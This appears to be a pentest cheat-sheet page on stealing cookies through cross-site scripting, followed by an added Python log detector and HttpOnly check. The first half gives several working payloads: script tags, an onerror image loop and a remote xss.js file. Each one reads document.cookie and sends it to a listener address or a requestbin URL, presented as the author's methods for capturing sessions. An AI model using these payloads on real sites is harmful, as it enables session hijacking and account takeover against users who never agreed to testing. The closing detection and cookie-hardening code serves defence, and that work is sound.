Stealing Cookies

Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities.

Payloads

Verification with alert()

This payload will pop an alert() box prior to sending the cookie. This can be useful for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box closes, the cookie will be sent to the listening server:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>

Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>

CTF Only Payload

The following payload leverages the img tag rather than script and will fire onerror() in a loop (each failed load of the new src triggers onerror again), ultimately flooding your server with cookie requests. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>

My Preferred Method

The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I host on a Python web server:

<script src="http://172.0.0.1/xss.js"></script>
"><script src=http://172.0.0.1/xss.js></script>

The xss.js file looks like the following; ultimately it does the same as the payloads above, grabbing the cookies and sending them to my hosted web server:

function pwn() {
    var img = document.createElement("img");
    img.src = "http://172.0.0.1/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();

Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or a controlled Burp Collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites such as requestbin that you can send the request to:

http://172.0.0.1:1337/<script>new Image().src="http://requestbin.net/r/mybin?c="+document.cookie;</script>
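From the defending side, the payloads above have two things in common: the injected request carries a document.cookie read next to an exfiltration sink (or, for the xss.js variant, a script tag pointing at another origin), and all of them only reach cookies set without HttpOnly. The Python below is an added example, not code from the original page: it flags those request shapes in constructed access-log lines and lists which cookies from a set of Set-Cookie headers document.cookie could expose. The log lines, client IPs and cookie names are constructed sample data.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed access-log lines (not from the page): the payload shapes above,
# URL-encoded the way a browser submits them, plus one benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /search?q=%3Cscript%3Evar%20i%3Dnew%20Image%3Bi.src%3D%22http%3A%2F%2F172.0.0.1%3A1337%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /search?q=%22%3E%3Cscript%20src%3Dhttp%3A%2F%2F172.0.0.1%2Fxss.js%3E%3C%2Fscript%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /search?q=cookies HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Jan/2024:12:00:04 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dthis.src%3D%27http%3A%2F%2F172.0.0.1%3A1337%2F%3F%27%2Bdocument.cookie%3B%3E HTTP/1.1" 200 512',
]
# Constructed Set-Cookie headers: only "session" is out of reach of document.cookie.
SAMPLE_SET_COOKIE = [
    "session=7f3a9c0e; Path=/; Secure; HttpOnly; SameSite=Lax",
    "user=admin; Path=/",
    "prefs=dark; Path=/; Secure",
]

_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A read of document.cookie next to a way of shipping it off-site.
_COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)
_EXFIL_SINK = re.compile(r"new\s+Image|\.src\s*=|onerror\s*=", re.I)
# The xss.js variant keeps the cookie read out of the request, so a script tag
# sourced from an absolute http(s) URL is flagged on its own.
_REMOTE_SCRIPT = re.compile(r"<script[^>]*src\s*=\s*['\"]?https?://", re.I)

def flag_cookie_theft_requests(log_lines):
    """Return the decoded request targets that carry a cookie-stealing XSS payload."""
    hits = []
    for line in log_lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        # Decode twice: double-encoded payloads are common and a second pass is harmless here.
        target = unquote(unquote_plus(m.group(1)))
        if _REMOTE_SCRIPT.search(target) or (
            _COOKIE_READ.search(target) and _EXFIL_SINK.search(target)
        ):
            hits.append(target)
    return hits

def script_readable_cookies(set_cookie_headers):
    """Names of cookies document.cookie (and so every payload above) can read: those lacking HttpOnly."""
    readable = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attrs:
            readable.append(name)
    return readable
```

Marking the session cookie HttpOnly (and Secure with a SameSite value) is what stops every payload on this page from reading it, which is why the second function is the check worth running before the first.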
